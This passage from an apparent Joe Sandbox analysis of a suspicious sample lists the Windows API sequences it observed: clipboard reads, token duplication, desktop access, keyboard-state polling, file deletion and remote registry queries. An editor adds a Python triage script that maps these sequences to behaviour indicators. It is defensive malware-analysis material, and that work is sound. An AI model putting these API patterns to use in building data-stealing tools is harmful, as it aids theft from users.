                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                              • String ID:
                                                                              • API String ID: 3222323430-0
                                                                              • Opcode ID: 355ed5c00a7d6b55338ee40e518e4cdadfa27fc71c836dacde113147a317e064
                                                                              • Instruction ID: a5f1e1376fb55073e7b7009f86497b8b82036a29d431b038604c24214120d0e2
                                                                              • Opcode Fuzzy Hash: 355ed5c00a7d6b55338ee40e518e4cdadfa27fc71c836dacde113147a317e064
                                                                              • Instruction Fuzzy Hash: B751AC79349205ABD300AF68DD56FAE77B8EF85B00F01042DF69AD21E1DF70E8459B62
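                                                                              The three routines above are recognisable from their API combinations alone: the Shell_TrayWnd routine attaches the caller's input queue to the foreground thread with AttachThreadInput and taps Alt (keybd_event with virtual key 0x12, VK_MENU) so that SetForegroundWindow is honoured despite the foreground lock; the token routine duplicates a primary token (DuplicateTokenEx with SecurityImpersonation/TokenPrimary) and opens winsta0 and the default desktop with WRITE_DAC-class access; the clipboard routine pulls CF_UNICODETEXT (0xD) and then CF_TEXT (0x1). The Python below is an added triage example, not part of the Joe Sandbox report: it parses "APIs" rows in the exact format shown on this page and maps such combinations to behaviour indicators. The rule set and the indicator names are the editor's own heuristics; the sample blocks are excerpts of the rows above; the constant names (VK_MENU, CF_TEXT, CF_UNICODETEXT) are the Windows SDK values.

```python
"""Triage helper for Joe Sandbox "APIs" listings (added example, not report code).
Parses the bullet rows of an APIs block into structured calls and maps known
call combinations to behaviour indicators. Rules are the editor's own heuristics."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One row: optional "Part of subcall function <addr>:" prefix, Api.MODULE,
# optional "(args)", then "ref: <addr>". Unknown arguments appear as "?".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
VK_MENU = 0x12                                   # Alt: keybd_event(0x12, ...)
CLIP_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int] = None             # callee address for "Part of subcall" rows


def _decode_arg(tok: str):
    """8 hex digits -> int; anything else ('?' or an inline string) stays text."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_api_block(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:                                # headings and non-API rows
            continue
        raw = m.group("args")
        args = [] if raw is None else [_decode_arg(a.strip()) for a in raw.split(",")]
        sub = int(m.group("subfn"), 16) if m.group("subfn") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def triage(text: str) -> dict:
    """Return {indicator_name: details} for the API rows in `text`."""
    calls = parse_api_block(text)
    names = {c.api for c in calls}
    hits = {}
    # Foreground forcing: attach to the foreground thread's input queue and tap Alt
    # so SetForegroundWindow succeeds even when the foreground lock is active.
    alt = [c for c in calls if c.api == "keybd_event" and c.args[:1] == [VK_MENU]]
    if {"AttachThreadInput", "SetForegroundWindow"} <= names and alt:
        hits["foreground_focus_forcing"] = {
            "alt_keypresses": len(alt),
            "targets": [c.args[0] for c in calls
                        if c.api == "FindWindowW" and c.args and isinstance(c.args[0], str)],
        }
    # Token duplication plus opening winsta0/default: groundwork for running a
    # process under another token with access to the interactive desktop.
    if {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"} <= names:
        hits["token_and_desktop_access"] = {
            "adjusts_privileges": "AdjustTokenPrivileges" in names,
            "objects": [c.args[0] for c in calls if c.api in ("OpenWindowStationW", "OpenDesktopW")],
        }
    # Clipboard read: record which formats are pulled, decoded where known.
    fmts = [CLIP_FORMATS.get(c.args[0], str(c.args[0]))
            for c in calls if c.api == "GetClipboardData" and c.args]
    if "OpenClipboard" in names and fmts:
        hits["clipboard_read"] = {"formats": fmts}
    # Recursive walk: a Find*File loop combined with SetCurrentDirectory.
    if {"FindFirstFileW", "FindNextFileW", "SetCurrentDirectoryW"} <= names:
        hits["recursive_directory_walk"] = {
            "masks": [a for c in calls if c.api == "FindFirstFileW"
                      for a in c.args if isinstance(a, str) and "*" in a],
        }
    return hits


# Excerpts of the API rows on this page (focus forcing, token/desktop, clipboard, walk).
FOCUS_BLOCK = """• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00933AEA
• SetForegroundWindow.USER32(000000FF), ref: 00933B0A
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00933B44
• keybd_event.USER32(00000012,00000000), ref: 00933B77
• keybd_event.USER32(00000012,00000000), ref: 00933B86
• keybd_event.USER32(00000012,00000000), ref: 00933B94
• keybd_event.USER32(00000012,00000000), ref: 00933BA3"""
TOKEN_BLOCK = """  • Part of subcall function 008FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008FAD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008FAD82
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008FADBF"""
CLIP_BLOCK = """• OpenClipboard.USER32(0095DC00), ref: 00916B36
• GetClipboardData.USER32(0000000D), ref: 00916B4C
• GetClipboardData.USER32(00000001), ref: 00916BA8
• CloseClipboard.USER32 ref: 00916CF6"""
WALK_BLOCK = """• FindFirstFileW.KERNEL32(*.*,?), ref: 00911BE7
• SetCurrentDirectoryW.KERNEL32(?), ref: 00911C37
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00911C5F"""

if __name__ == "__main__":
    for name, block in [("focus", FOCUS_BLOCK), ("token", TOKEN_BLOCK),
                        ("clipboard", CLIP_BLOCK), ("walk", WALK_BLOCK)]:
        print(name, triage(block))
```

                                                                              Weight these indicators carefully. The AttachThreadInput/Alt-tap sequence is exactly how automation runtimes (AutoIt's WinActivate, for one) activate windows, and a FindFirstFileW/FindNextFileW/SetCurrentDirectoryW loop is ordinary recursive traversal, so on their own they are weak evidence of malice. They become useful as corroboration alongside the stronger behavioural findings in the report (process injection, credential access), and as pivots: the clipboard formats and the winsta0/default objects tell an analyst which data and which desktop the code can reach.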
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0090F62B
                                                                              • FindClose.KERNEL32(00000000), ref: 0090F67F
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0090F6A4
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0090F6BB
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0090F6E2
                                                                              • __swprintf.LIBCMT ref: 0090F72E
                                                                              • __swprintf.LIBCMT ref: 0090F767
                                                                              • __swprintf.LIBCMT ref: 0090F7BB
                                                                                • Part of subcall function 008E172B: __woutput_l.LIBCMT ref: 008E1784
                                                                              • __swprintf.LIBCMT ref: 0090F809
                                                                              • __swprintf.LIBCMT ref: 0090F858
                                                                              • __swprintf.LIBCMT ref: 0090F8A7
                                                                              • __swprintf.LIBCMT ref: 0090F8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 835046349-2428617273
                                                                              • Opcode ID: a05fa3db61a4f4db1116b65cdd986a48654f4ae227727e7157a16ad1888d814c
                                                                              • Instruction ID: d606ab6f1576d2f0820e9b6784a97ac9a36fd4413c2f21952700de8bb7cd83f8
                                                                              • Opcode Fuzzy Hash: a05fa3db61a4f4db1116b65cdd986a48654f4ae227727e7157a16ad1888d814c
                                                                              • Instruction Fuzzy Hash: 05A1FDB2408244ABC350EB99C895EAFB7ECFF95704F44092EF595C2192EB34DA49C763
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00911B50
                                                                              • _wcscmp.LIBCMT ref: 00911B65
                                                                              • _wcscmp.LIBCMT ref: 00911B7C
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00911B8E
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00911BA8
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00911BC0
                                                                              • FindClose.KERNEL32(00000000), ref: 00911BCB
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00911BE7
                                                                              • _wcscmp.LIBCMT ref: 00911C0E
                                                                              • _wcscmp.LIBCMT ref: 00911C25
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00911C37
                                                                              • SetCurrentDirectoryW.KERNEL32(009739FC), ref: 00911C55
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00911C5F
                                                                              • FindClose.KERNEL32(00000000), ref: 00911C6C
                                                                              • FindClose.KERNEL32(00000000), ref: 00911C7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: eddd04161c160072828b9f0f7e544eee78608fadedebc46ecf284fd7ce52bb34
                                                                              • Instruction ID: 9c06db0d0f2ee6e5fe70955c293e1ac186e980b5f770af936fe66d2ba5d3730a
                                                                              • Opcode Fuzzy Hash: eddd04161c160072828b9f0f7e544eee78608fadedebc46ecf284fd7ce52bb34
                                                                              • Instruction Fuzzy Hash: 0F31F33674561EBBDF14EFA4DC49EDE73ACAF4A324F004155EA15E2090EB70DA848AA4
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00911CAB
                                                                              • _wcscmp.LIBCMT ref: 00911CC0
                                                                              • _wcscmp.LIBCMT ref: 00911CD7
                                                                                • Part of subcall function 00906BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00906BEF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00911D06
                                                                              • FindClose.KERNEL32(00000000), ref: 00911D11
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00911D2D
                                                                              • _wcscmp.LIBCMT ref: 00911D54
                                                                              • _wcscmp.LIBCMT ref: 00911D6B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00911D7D
                                                                              • SetCurrentDirectoryW.KERNEL32(009739FC), ref: 00911D9B
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00911DA5
                                                                              • FindClose.KERNEL32(00000000), ref: 00911DB2
                                                                              • FindClose.KERNEL32(00000000), ref: 00911DC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: d7fbf1bec741d32594171f22e9f2103dd04e2d47b990c497d7f9d90f388bc34c
                                                                              • Instruction ID: b3889d53efa780b1940676b8d3d3ec27566d789e3cfb3fdd48b5c901e7bd9003
                                                                              • Opcode Fuzzy Hash: d7fbf1bec741d32594171f22e9f2103dd04e2d47b990c497d7f9d90f388bc34c
                                                                              • Instruction Fuzzy Hash: 2D31243A60561EBADF10EFA4EC09EDE37ACAF46324F104555EA11E30D0DB70DAC58BA4
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                              • API String ID: 2102423945-2023335898
                                                                              • Opcode ID: 432ce2afa1ebbfd5fa978987cf1ce8de84c89f215807beb626ca8a1f6bcf8982
                                                                              • Instruction ID: b96cb5040b224312fa3e6d4e83cf8244098fd49d23d28142cd62d3c76a4b8d66
                                                                              • Opcode Fuzzy Hash: 432ce2afa1ebbfd5fa978987cf1ce8de84c89f215807beb626ca8a1f6bcf8982
                                                                              • Instruction Fuzzy Hash: 8C828D72D04219DBCB24CF98C890BADBBB1FF48314F2581AAD859AB251E774DD85CF90
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 009109DF
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 009109EF
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009109FB
                                                                              • __wsplitpath.LIBCMT ref: 00910A59
                                                                              • _wcscat.LIBCMT ref: 00910A71
                                                                              • _wcscat.LIBCMT ref: 00910A83
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00910A98
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910AAC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910ADE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910AFF
                                                                              • _wcscpy.LIBCMT ref: 00910B0B
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00910B4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3566783562-438819550
                                                                              • Opcode ID: 1e7d71b1ffd35b768dc8ddc6daeddb37e6521dc1c939028522d72ffc45c11c36
                                                                              • Instruction ID: 8ced8983905fa418b22f646f3828d90dea12dddda6541c8668ed035acc990d57
                                                                              • Opcode Fuzzy Hash: 1e7d71b1ffd35b768dc8ddc6daeddb37e6521dc1c939028522d72ffc45c11c36
                                                                              • Instruction Fuzzy Hash: AC6149766082099FD710EF64C845E9EB3E8FF89310F04891EF989C7251DB76E985CB92
                                                                              APIs
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
                                                                                • Part of subcall function 008FABBB: GetLastError.KERNEL32(?,008FA69F,?,?,?), ref: 008FABE1
                                                                                • Part of subcall function 008FABBB: GetProcessHeap.KERNEL32(00000008,?,?,008FA69F,?,?,?), ref: 008FABF0
                                                                                • Part of subcall function 008FABBB: HeapAlloc.KERNEL32(00000000,?,008FA69F,?,?,?), ref: 008FABF7
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 008FAC0E
                                                                                • Part of subcall function 008FAC56: GetProcessHeap.KERNEL32(00000008,008FA6B5,00000000,00000000,?,008FA6B5,?), ref: 008FAC62
                                                                                • Part of subcall function 008FAC56: HeapAlloc.KERNEL32(00000000,?,008FA6B5,?), ref: 008FAC69
                                                                                • Part of subcall function 008FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008FA6B5,?), ref: 008FAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008FA6D0
                                                                              • _memset.LIBCMT ref: 008FA6E5
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008FA704
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA715
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 008FA752
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008FA76E
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA78B
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008FA79A
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 008FA7A1
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008FA7C2
                                                                              • CopySid.ADVAPI32(00000000), ref: 008FA7C9
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008FA7FA
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008FA820
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008FA834
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 602899c365185350903ad6d156eeff215b197e8103f5bb159625185a5f536bec
                                                                              • Instruction ID: 182b3defb185eb33c2ca8064466d584d45ace7e683fc64a291597c3bea2bb274
                                                                              • Opcode Fuzzy Hash: 602899c365185350903ad6d156eeff215b197e8103f5bb159625185a5f536bec
                                                                              • Instruction Fuzzy Hash: 315169B5910209ABCF08DFA4DC44EFEBBB9FF05310F048129EA19E7290DB349A15DB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                              • API String ID: 0-4052911093
                                                                              • Opcode ID: 851bd8b0a9325b4637a17ae4780922224063522c098e01a03b7de4c86ed481bd
                                                                              • Instruction ID: e6d5889e2d7d7328372b3b007e4e2e11ee2ea2465ca50152b22c31908c3605e1
                                                                              • Opcode Fuzzy Hash: 851bd8b0a9325b4637a17ae4780922224063522c098e01a03b7de4c86ed481bd
                                                                              • Instruction Fuzzy Hash: AB725E71E04219DBDB24CF68C880BAEB7B5FF48310F54816AE945EB281EB749E41DF94
                                                                              APIs
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
                                                                                • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
                                                                              • _wcscat.LIBCMT ref: 00906441
                                                                              • __wsplitpath.LIBCMT ref: 0090645F
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00906474
                                                                              • _wcscpy.LIBCMT ref: 009064A3
                                                                              • _wcscat.LIBCMT ref: 009064B8
                                                                              • _wcscat.LIBCMT ref: 009064CA
                                                                              • DeleteFileW.KERNEL32(?), ref: 009064DA
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009064EB
                                                                              • FindClose.KERNEL32(00000000), ref: 00906506
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                              • String ID: \*.*
                                                                              • API String ID: 2643075503-1173974218
                                                                              • Opcode ID: f839177ca765eeb7c275363f653c8bacfd34c7ce33d2edd8a94d5404e1833daf
                                                                              • Instruction ID: cdfb1141ee0963b828794a228bb463012001b09b581d04b892cccf6b487be139
                                                                              • Opcode Fuzzy Hash: f839177ca765eeb7c275363f653c8bacfd34c7ce33d2edd8a94d5404e1833daf
                                                                              • Instruction Fuzzy Hash: 5D3171B240C3849EC721DBA88C85DDBB7DCAF96314F44492AF6D8C3181EB35D54987A7
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0092328E
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0092332D
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009233C5
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00923604
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00923611
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              • Opcode ID: 7af1d15d52b75d678825d677f364fa3e5af9e2bf0268864be5bc7a9aae677012
                                                                              • Instruction ID: 44f121639d7c5b8e4ca62687b0af195a8f6a858f2b38fabb8e6252b11d1a633e
                                                                              • Opcode Fuzzy Hash: 7af1d15d52b75d678825d677f364fa3e5af9e2bf0268864be5bc7a9aae677012
                                                                              • Instruction Fuzzy Hash: C5E14875604210AFCB14DF28D895E2ABBF9FF89310B04896DF44ADB2A5DB34ED05CB52
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 00902B5F
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00902BE0
                                                                              • GetKeyState.USER32(000000A0), ref: 00902BFB
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00902C15
                                                                              • GetKeyState.USER32(000000A1), ref: 00902C2A
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00902C42
                                                                              • GetKeyState.USER32(00000011), ref: 00902C54
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00902C6C
                                                                              • GetKeyState.USER32(00000012), ref: 00902C7E
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00902C96
                                                                              • GetKeyState.USER32(0000005B), ref: 00902CA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
